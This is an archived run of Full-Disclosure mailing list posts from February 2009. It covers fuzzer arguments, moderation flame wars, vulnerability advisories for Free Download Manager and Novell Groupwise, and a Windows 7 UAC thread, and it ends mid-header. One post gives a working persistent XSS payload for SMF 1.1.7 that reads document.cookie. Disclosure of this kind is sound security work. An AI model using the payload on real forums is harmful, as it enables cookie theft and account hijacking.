The Metasploit Project

From pete.licoln at gmail.com Sun Feb 1 00:49:05 2009 From: pete.licoln at gmail.com (Pete Licoln) Date: Sat, 31 Jan 2009 19:49:05 -0500 Subject: [Full-disclosure] Browser Fuzzer 2 In-Reply-To: <4984CCD7.6000404@gmail.com> References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com> Message-ID: Don't like it? Trash it. I did. But on the other side, you ask for comments for your fuzzers I give somes constructive . Don't like it ? stay blind & Trash it :) Pete Licoln wrote: > Hi Jeremy, > > I think this fuzzer is useless, and doesn't have any kind of innovation. > This fuzzer acts as a cheap binary fuzzer, without any automation on > the targeted browser, like your others fuzzers you've wrote. > There's severals DOM CSS DHTML fuzzers written in JS way more > powerfull, did you heard about them ? > > Next time take some times before releasing such useless stuff. > > > Regards > > > > 2009/1/31 Krakow Labs > > > That is one point I would like to get across: fuzzing doesn't have > to be > and frequently isn't random, no matter how much the wikis copy its > 'definition'. The fuzzing oracle is the heart of the fuzzing process, > and making sure it is adequate to check for bugs is, I feel, a key to > being successful when fuzzing. I understand that near complete > randomness can be effective as demonstrated with mangleme, etc, but I > rarely choose that approach when working on projects; I just do not > think of it as a huge benefit. And the number of fuzzing files is > limited to the functions and tags and to the fuzzing oracle, all of > which can be modified and rearranged. Information, information, > information :) > > You did ask some good questions, thanks for your input. > > webDEViL wrote: > > Hello Jeremy, > > > > I am in no way trying to criticise your work, just had a few > questions > > that I had to ask :) > > > > Your fuzzers are like meant to be run only once, cause pretty much > > everyone will have the same files created. > > Why isnt there any randomness in creating the fuzzed files? > > bf2[phase four] JS Process Complete (Final Count: 8004). > > > > Well I am saying that your fuzzer will die, in like a day, cause the > > number of files is finite and very few in number. > > Whats the point with such fuzzers being released to the community? > > > > > > > > Regards, > > webDEViL > > > > > > On Fri, Jan 30, 2009 at 11:14 PM, Krakow Labs > > > >> wrote: > > > > Krakow Labs Development > > > > Browser Fuzzer 2 (bf2) is a comprehensive web browser fuzzer > that > > fuzzes > > CSS, DOM, HTML and JavaScript. > > > > bf2 is available @ www.krakowlabs.com > > > > > > > -KL > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090131/2f528cbf/attachment.html From ssdd.gr at gmail.com Sun Feb 1 04:52:35 2009 From: ssdd.gr at gmail.com (Miltiadis Kandias) Date: Sun, 1 Feb 2009 06:52:35 +0200 Subject: [Full-disclosure] Browser Fuzzer 2 In-Reply-To: References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com> Message-ID: Mr Pete Licoln, Excuse me for being rude but you said you made constructive comments. You must be tottaly ignorant to believe that. I haven't tested the fuzzer yet, but if I don't like it I will say thank you and never use it again If I see potential I will give some comments. I think that you insulted yourself doing such comments, even though you seem not to care. But, on the other side what do I know? I am just a fellow Greek... Have a nice day! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090201/223d0a11/attachment.html From bambenek.infosec at gmail.com Sun Feb 1 17:41:38 2009 From: bambenek.infosec at gmail.com (John C. A. Bambenek, GCIH, CISSP) Date: Sun, 1 Feb 2009 11:41:38 -0600 Subject: [Full-disclosure] Administrivia: Spring Cleaning In-Reply-To: <49849AF1.3050207@gmail.com> References: <20090130143205.GA17036@grok.org.uk> <20090130191615.GA7598@sivokote.iziade.m$> <754924960901301814r43208297k21a1aff1bb922ba2@mail.gmail.com> <49842A0E.7010709@gmail.com> <20882.1233400524@turing-police.cc.vt.edu> <49849AF1.3050207@gmail.com> Message-ID: Looks like someone else is volunteering to join Andrew is F-D purgatory On 1/31/09, don bailey wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Valdis.Kletnieks at vt.edu wrote: >> On Sat, 31 Jan 2009 03:38:06 MST, don bailey said: >> >>> of noise. If this is allowed, it only proves that free venues for >>> security discussion (rational or not) can be manipulated with something >>> as simple as inane chatter. >> >> It's *long* been understood within the security community that the best >> way >> to deal with a DoS attack is to disable the source of the attack. >> > > Seriously, why are you even talking? Do you really think anyone > considers your rampant condescending remarks to have any semblance of > value? Go trim your UNIX beard. > > D > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v2.0.9 (GNU/Linux) > > iEYEARECAAYFAkmEmvEACgkQttfe3HwtctP2LwCgw40eo/kDwQl8eFU3YVLLes1Q > LMEAn2CiYqL/372UIxcl3HjTjo7ojcaT > =i2JM > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Sent from my mobile device From ghosts at gmail.com Sun Feb 1 18:22:51 2009 From: ghosts at gmail.com (ghost) Date: Sun, 1 Feb 2009 13:22:51 -0500 Subject: [Full-disclosure] Administrivia: Spring Cleaning In-Reply-To: References: <20090130143205.GA17036@grok.org.uk> <20090130191615.GA7598@sivokote.iziade.m$> <754924960901301814r43208297k21a1aff1bb922ba2@mail.gmail.com> <49842A0E.7010709@gmail.com> <20882.1233400524@turing-police.cc.vt.edu> <49849AF1.3050207@gmail.com> Message-ID: <6f4bb0b50902011022w4bee72cyd9c4cd206c52a322@mail.gmail.com> as much as I try and squint, your e-mail address still doesnt turn into johnc at grok.org.uk so maybe you should shut the fuck up and not play moderator when you arent wanted nor needed. On Sun, Feb 1, 2009 at 12:41 PM, John C. A. Bambenek, GCIH, CISSP wrote: > Looks like someone else is volunteering to join Andrew is F-D purgatory > From vulcanius at gmail.com Sun Feb 1 18:27:41 2009 From: vulcanius at gmail.com (vulcanius) Date: Sun, 1 Feb 2009 13:27:41 -0500 Subject: [Full-disclosure] Administrivia: Spring Cleaning In-Reply-To: <20090130143205.GA17036@grok.org.uk> References: <20090130143205.GA17036@grok.org.uk> Message-ID: Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090201/80bf2e69/attachment.html From pete.licoln at gmail.com Sun Feb 1 21:51:27 2009 From: pete.licoln at gmail.com (Pete Licoln) Date: Sun, 1 Feb 2009 16:51:27 -0500 Subject: [Full-disclosure] Browser Fuzzer 2 In-Reply-To: References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com>

Message-ID: Im not a dick to people, and that's not the purpose of my comments. But he's releasing a fuzzer a day: - RSH Fuzzer - CVS Fuzzer - PDF Fuzzer - SSH Fuzzer - JPEG Fuzzer - TFTP Fuzzer - MySQL Fuzzer - Browser Fuzzer (1 & 2) - MP3-TAGS Fuzzer They're all the sames kinds of fuzzing, on totally different kinds of protocols, he ask for comments, and I m saying kindly to this man, that he can release BETTER stuff if he waits and study a bit more a protocol. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090201/8f21e3e5/attachment.html From prb at lava.net Sun Feb 1 22:17:27 2009 From: prb at lava.net (Peter Besenbruch) Date: Sun, 1 Feb 2009 12:17:27 -1000 Subject: [Full-disclosure] Administrivia: Spring Cleaning In-Reply-To: References: <20090130143205.GA17036@grok.org.uk> Message-ID: <200902011217.28111.prb@lava.net> On Sunday 01 February 2009 08:27:41 vulcanius wrote: > Thank you. I have five Full Disclosure filtering lists, three of which are affected by John's decision. I went back and read this thread at one of the sites that archives Full Disclosure, because some of the users trigger the filters if they appear anywhere in the message; that's how bad it has gotten. So let me add my thanks to Vulcanius', and ask if you have a list of the banned names, so I can adjust my filters. -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky From 0xjbrown41 at gmail.com Sun Feb 1 23:52:46 2009 From: 0xjbrown41 at gmail.com (Jeremy Brown) Date: Sun, 1 Feb 2009 18:52:46 -0500 Subject: [Full-disclosure] Browser Fuzzer 2 In-Reply-To: References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com>

Message-ID: Pete, I've never asked for comments. I don't release 'a fuzzer a day' either; those were coded across the months. This whole thread talks in circles around itself and your opinion counts just like everyone elses, peachy. Jeremy On Sun, Feb 1, 2009 at 4:51 PM, Pete Licoln wrote: > Im not a dick to people, and that's not the purpose of my comments. > But he's releasing a fuzzer a day: > > - RSH Fuzzer > - CVS Fuzzer > - PDF Fuzzer > - SSH Fuzzer > - JPEG Fuzzer > - TFTP Fuzzer > - MySQL Fuzzer > - Browser Fuzzer (1 & 2) > - MP3-TAGS Fuzzer > > They're all the sames kinds of fuzzing, on totally different kinds of > protocols, he ask for comments, and I m saying kindly to this man, that he > can release BETTER stuff if he waits and study a bit more a protocol. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From biz.marqee at gmail.com Mon Feb 2 05:32:18 2009 From: biz.marqee at gmail.com (Biz Marqee) Date: Mon, 2 Feb 2009 16:32:18 +1100 Subject: [Full-disclosure] Administrivia: Spring Cleaning Message-ID: n3td3v being moderated is fantastic. his banning is not a strike against the "spirit" of fd, its someone standing up and saying "I have had enough of this fruitcake". full disclosure is great when its dropping 0day, discussing security in general, coming off as a righteous plan9 ninja, insulting people who disagree with your opinion and all the rest that goes along with it. it isnt great when you have a serial pest constantly baiting people and flooding the list with junk... junk that has no technical or even comedic value. its just rambling. he isnt some passing troll.. 3 years this guy has been spouting his nonsense and i am sure this isnt a decision that John takes lightly but something needed to be done before everyone left. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090202/f9a4f812/attachment.html From mikie.simpson at gmail.com Mon Feb 2 10:10:25 2009 From: mikie.simpson at gmail.com (Michael Simpson) Date: Mon, 2 Feb 2009 10:10:25 +0000 Subject: [Full-disclosure] Hackery Channel 01-09-01-LOLZ: Cat Spoofing against Flow Control In-Reply-To: <4983589D.7090804@csuohio.edu> References: <6171c6010901300857m748e84beld7ad454a5100ad19@mail.gmail.com> <4983589D.7090804@csuohio.edu> Message-ID: <82abd3a70902020210i32302b87p5b6a86c83e519efc@mail.gmail.com> On 1/30/09, Michael Holstein wrote: > > > Have any of you guys heard of RFID? > > Yeah .. wouldn't it make more sense to just build one that reads the > AVID chip most pets have in them anyway? > friends of mine couldn't understand how their kitchen was still full of cats every night after they implemented an rfid system on the cat's collar turns out the cat was standing close enough to the door to activate the lock whilst its pals gained entry social engineering / evil employee approach mike From nekramer at mindtheater.net Mon Feb 2 11:02:18 2009 From: nekramer at mindtheater.net (Nancy Kramer) Date: Mon, 02 Feb 2009 06:02:18 -0500 Subject: [Full-disclosure] Hackery Channel 01-09-01-LOLZ: Cat Spoofing against Flow Control In-Reply-To: <82abd3a70902020210i32302b87p5b6a86c83e519efc@mail.gmail.co m> References: <6171c6010901300857m748e84beld7ad454a5100ad19@mail.gmail.com> <4983589D.7090804@csuohio.edu> <82abd3a70902020210i32302b87p5b6a86c83e519efc@mail.gmail.com> Message-ID: <6.0.1.1.2.20090202060121.067d8ac0@mail.mindtheater.net> Most people don't realize it but cats are actually very social animals. Also very smart. That explains the behavior you are seeing. Regards, Nancy Kramer At 05:10 AM 2/2/2009, Michael Simpson wrote: >On 1/30/09, Michael Holstein wrote: > > > > > Have any of you guys heard of RFID? > > > > Yeah .. wouldn't it make more sense to just build one that reads the > > AVID chip most pets have in them anyway? > > > >friends of mine couldn't understand how their kitchen was still full >of cats every night after they implemented an rfid system on the cat's >collar > >turns out the cat was standing close enough to the door to activate >the lock whilst its pals gained entry > >social engineering / evil employee approach > >mike > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > >-- >No virus found in this incoming message. >Checked by AVG. >Version: 7.5.552 / Virus Database: 270.10.16/1929 - Release Date: 2/1/2009 >6:02 PM -- No virus found in this outgoing message. Checked by AVG. Version: 7.5.552 / Virus Database: 270.10.16/1929 - Release Date: 2/1/2009 6:02 PM From remove-vuln at secunia.com Mon Feb 2 11:36:53 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Mon, 2 Feb 2009 12:36:53 +0100 Subject: [Full-disclosure] Secunia Research: Free Download Manager Remote Control Server Buffer Overflow Message-ID: <200902021136.n12Bar4u023163@ca.secunia.com> ====================================================================== Secunia Research 02/02/2009 - Free Download Manager Remote Control Server Buffer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * Free Download Manager 2.5 Build 758 * Free Download Manager 3.0 Build 844 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software "What is Free Download Manager? It is a powerful, easy-to-use and absolutely free download accelerator and manager. Moreover, FDM is 100% safe, open-source software distributed under GPL license.". Product Link: http://www.freedownloadmanager.org/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Free Download Manager, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the Remote Control Server when processing "Authorization" headers in HTTP requests. This can be exploited to cause a stack-based buffer overflow via an HTTP request containing an overly long "Authorization" header. Successful exploitation allows execution of arbitrary code. ====================================================================== 5) Solution Update to version 3.0 build 848. ====================================================================== 6) Time Table 20/01/2009 - Form submitted on the vendor's website asking for e-mail address of security contact. 27/01/2009 - E-mail sent to various e-mail addresses asking for contact information of security contact. 27/01/2009 - Vendor response (e-mail address of security contact provided). 28/01/2009 - Vulnerability details sent to the vendor. 28/01/2009 - Fixed version provided for testing by the vendor. 28/01/2009 - Vendor informed that vulnerability is fixed. 31/01/2009 - Vendor issues fixed version. 02/02/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0183 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-3/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From remove-vuln at secunia.com Mon Feb 2 11:37:02 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Mon, 2 Feb 2009 12:37:02 +0100 Subject: [Full-disclosure] Secunia Research: Free Download Manager Torrent Parsing Buffer Overflows Message-ID: <200902021137.n12Bb240023201@ca.secunia.com> ====================================================================== Secunia Research 02/02/2009 - Free Download Manager Torrent Parsing Buffer Overflows - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * Free Download Manager 2.5 Build 758 * Free Download Manager 3.0 Build 844 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software "What is Free Download Manager? It is a powerful, easy-to-use and absolutely free download accelerator and manager. Moreover, FDM is 100% safe, open-source software distributed under GPL license.". Product Link: http://www.freedownloadmanager.org/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered some vulnerabilities in Free Download Manager, which can be exploited by malicious people to compromise a user's system. 1) A boundary error in the parsing of file names inside torrent files can be exploited to cause a heap-based buffer overflow via an overly long file name. 2) Two boundary errors when parsing names from torrent files can be exploited to cause stack-based buffer overflows via overly long file names. 3) A boundary error when parsing tracker URLs from torrent files can be exploited to cause a stack-based buffer overflow via an overly long tracker URL. 4) A boundary error when parsing comments from torrent files can be exploited to cause a stack-based buffer overflow via an overly long comment. Successful exploitation of the vulnerabilities allows execution of arbitrary code by e.g. tricking a user into opening a specially crafted torrent file. ====================================================================== 5) Solution Update to version 3.0 build 848. ====================================================================== 6) Time Table 20/01/2009 - Form submitted on the vendor's website asking for e-mail address of security contact. 27/01/2009 - E-mail sent to various e-mail addresses asking for contact information of security contact. 27/01/2009 - Vendor response (e-mail address of security contact provided). 28/01/2009 - Vulnerability details sent to the vendor. 28/01/2009 - Fixed version provided for testing by the vendor. 28/01/2009 - Vendor informed that all vulnerabilities have not been properly fixed. 30/01/2009 - New fixed version provided by the vendor. 30/01/2009 - Vendor informed that all vulnerabilities are fixed. 31/01/2009 - Vendor issues fixed version. 02/02/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0184 for the vulnerabilities. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-5/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From shawnmer at gmail.com Mon Feb 2 13:27:02 2009 From: shawnmer at gmail.com (Shawn Merdinger) Date: Mon, 2 Feb 2009 08:27:02 -0500 Subject: [Full-disclosure] Hackery Channel 01-09-01-LOLZ: Cat Spoofing against Flow Control In-Reply-To: <18572.1233335278@turing-police.cc.vt.edu> References: <18572.1233335278@turing-police.cc.vt.edu> Message-ID: On Fri, Jan 30, 2009 at 12:07 PM, wrote: > On Thu, 29 Jan 2009 17:04:53 CST, hack ery said: >> >> Security Risk: High >> Exploitable: Local >> Vulnerability: Arbitrary Flow Control Control, Cat Spoofing >> Discovered by: The Hackery Channel > > Note the additional possibility of a brute force attack: > > http://icanhascheezburger.files.wordpress.com/2009/01/funny-pictures-your-cat-is-ready-to-admit-he-gained-weight.jpg There's also potential for a low-silhouette piggyback attack vector: http://loganbay.org/wp-content/uploads/2007/10/thundercat.jpg Cheers, --scm From zdi-disclosures at 3com.com Mon Feb 2 17:52:54 2009 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Mon, 2 Feb 2009 11:52:54 -0600 Subject: [Full-disclosure] ZDI-09-010: Novell Netware Groupwise GWIA RCPT Command Buffer Overflow Vulnerability Message-ID: ZDI-09-010: Novell Netware Groupwise GWIA RCPT Command Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-010 February 2, 2009 -- Affected Vendors: Novell -- Affected Products: Novell Netware -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 1047. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netware Groupwise SMTP daemon. Authentication is not required to exploit this vulnerability. The specific flaw exists during the parsing of malformed RCPT verb arguments to the SMTP daemon. When an overly long e-mail address is received an off-by-one condition is triggered which minimally will cause a denial of service and can result in arbitrary code execution. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://download.novell.com/Download?buildid=GjZRRdqCFW0 http://download.novell.com/Download?buildid=HpEEW7aXWEY -- Disclosure Timeline: 2008-08-26 - Vulnerability reported to vendor 2009-02-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Nick DeBaggis -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From nytrokiss at gmail.com Mon Feb 2 18:47:41 2009 From: nytrokiss at gmail.com (James Matthews) Date: Mon, 2 Feb 2009 20:47:41 +0200 Subject: [Full-disclosure] Windows 7 UAC compromised Message-ID: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/ Windows is like swiss cheese! -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090202/d13e425c/attachment.html From Valdis.Kletnieks at vt.edu Mon Feb 2 19:07:02 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 02 Feb 2009 14:07:02 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: Your message of "Mon, 02 Feb 2009 20:47:41 +0200." <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> Message-ID: <28242.1233601622@turing-police.cc.vt.edu> On Mon, 02 Feb 2009 20:47:41 +0200, James Matthews said: > http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/ > > Windows is like swiss cheese! The biggest issue here is that although it's technically easy to fix this problem (just have UAC issue an alert when somebody's messing with the system settings), it involves doing more of what end users dislike most about UAC (it issuing alerts to Joe Sixpack all the time when he does something bone-headed security-wise). Fixing this one in a way that users will put up with will be a bitch. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090202/d7842775/attachment.bin From tbiehn at gmail.com Mon Feb 2 19:46:40 2009 From: tbiehn at gmail.com (T Biehn) Date: Mon, 2 Feb 2009 14:46:40 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <28242.1233601622@turing-police.cc.vt.edu> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> Message-ID: <2d6724810902021146k43bf983bx380b5119be96809f@mail.gmail.com> Not at all Valdis. Keep UAC exceptions for Desktop Settings, Keyboard Settings, Mundane / Trivial. Prompt from UAC on regedit32, reg, secedit, gpedit, the proggy that modifies uac settings. Most "Joe Sixpacks" will never touch any of that, and power users that do will understand why they're being prompted. Wow that -was- a bitch. This reminds me of when sp2 came out and you could just pop registry keys in allowing your naughty program to execute before it attempted to access the net. On Mon, Feb 2, 2009 at 2:07 PM, wrote: > On Mon, 02 Feb 2009 20:47:41 +0200, James Matthews said: > > > > http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/ > > > > Windows is like swiss cheese! > > The biggest issue here is that although it's technically easy to fix this > problem (just have UAC issue an alert when somebody's messing with the > system settings), it involves doing more of what end users dislike most > about UAC (it issuing alerts to Joe Sixpack all the time when he does > something bone-headed security-wise). > > Fixing this one in a way that users will put up with will be a bitch. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090202/9e070f22/attachment.html From mailinglist at brainiacghost.co.uk Mon Feb 2 19:14:36 2009 From: mailinglist at brainiacghost.co.uk (Christopher Pritchard) Date: Mon, 2 Feb 2009 19:14:36 -0000 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <28242.1233601622@turing-police.cc.vt.edu> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> Message-ID: <003d01c9856a$a3bd2780$eb377680$@co.uk> > The biggest issue here is that although it's technically easy to fix > this problem (just have UAC issue an alert when somebody's messing with > the system settings), it involves doing more of what end users dislike > most about UAC (it issuing alerts to Joe Sixpack all the time when he > does something bone-headed security-wise). > > Fixing this one in a way that users will put up with will be a bitch. Why not just have it not prompt if you are changing settings, except for UAC settings? that would be the simple way around it From filip.waeytens at gmail.com Mon Feb 2 18:57:59 2009 From: filip.waeytens at gmail.com (Filip Waeytens) Date: Mon, 2 Feb 2009 19:57:59 +0100 Subject: [Full-disclosure] BruCON call for papers Message-ID: Hi, BruCON aims to become the best and most fun hacking (*) and security event in Belgium and W. Europe offering a high quality line up of speakers, opportunities of networking with peers, hacking challenges and workshops. BruCON is an open-minded gathering of people discussing computer security, privacy, information technology and its cultural/ technical implications on society. The conference creates bridges between the various actors active in computer security world, included but not limited to hackers(*), security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies, etc... Call of Papers is officially open Authors can now submit an abstract of their presentation at http://cfp.brucon.org . Help us spread the word. The following resources are available to stay up to speed with the event. ? BruCON website : http://www.brucon.org/ ? BruCON on Twitter : http://twitter.com/brucon ? BruCON on LinkedIN : http://www.linkedin.com/groups?gid=1777141 ? BruCON Blog (RSS feed) : http://blog.brucon.org/ (http://feeds2.feedburner.com/Brucon ) cheers Filip -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090202/bbaa8175/attachment.html From sirdarckcat at gmail.com Tue Feb 3 08:56:37 2009 From: sirdarckcat at gmail.com (Eduardo Vela) Date: Tue, 3 Feb 2009 02:56:37 -0600 Subject: [Full-disclosure] SMF 1.1.7 Persistent XSS (requires permision to edit censor) Message-ID: <8ba534860902030056n617c1d98w9edb4263c7f389d7@mail.gmail.com> SMF 1.1.7 (simplemachines.org) XSS Exploitation: If you can modify the censor on a SMF forum, then you can make it execute arbitrary JS code. http://SMF.Forum.com/index.php?action=postsettings;sa=censor Just add the following entry: http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie) And then write a post, modify your signature, or send a PM with the code: [img]http://www.test.xss/[/img] And the HTML code generated will be..

Notes: - SMF is not using httpOnly cookies. - I'm going full disclosure with this because I've had bad experiences with the SMF team when reporting vulnerabilities.. Greetings!! -- Eduardo http://www.sirdarckcat.net/ From ureleet at gmail.com Tue Feb 3 14:47:19 2009 From: ureleet at gmail.com (Ureleet) Date: Tue, 3 Feb 2009 09:47:19 -0500 Subject: [Full-disclosure] Administrivia: Spring Cleaning In-Reply-To: References: Message-ID: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com> i m willing to bet he is still on the list tho. who knows how many aliases he has. no--i m not 1, even tho he accuses me of being 1. i guarantee hes watching right now. On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote: > n3td3v being moderated is fantastic. > > his banning is not a strike against the "spirit" of fd, its someone standing > up and saying "I have had enough of this fruitcake". > > full disclosure is great when its dropping 0day, discussing security in > general, coming off as a righteous plan9 ninja, insulting people who > disagree with your opinion and all the rest that goes along with it. it isnt > great when you have a serial pest constantly baiting people and flooding the > list with junk... junk that has no technical or even comedic value. its just > rambling. he isnt some passing troll.. 3 years this guy has been spouting > his nonsense and i am sure this isnt a decision that John takes lightly but > something needed to be done before everyone left. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Tue Feb 3 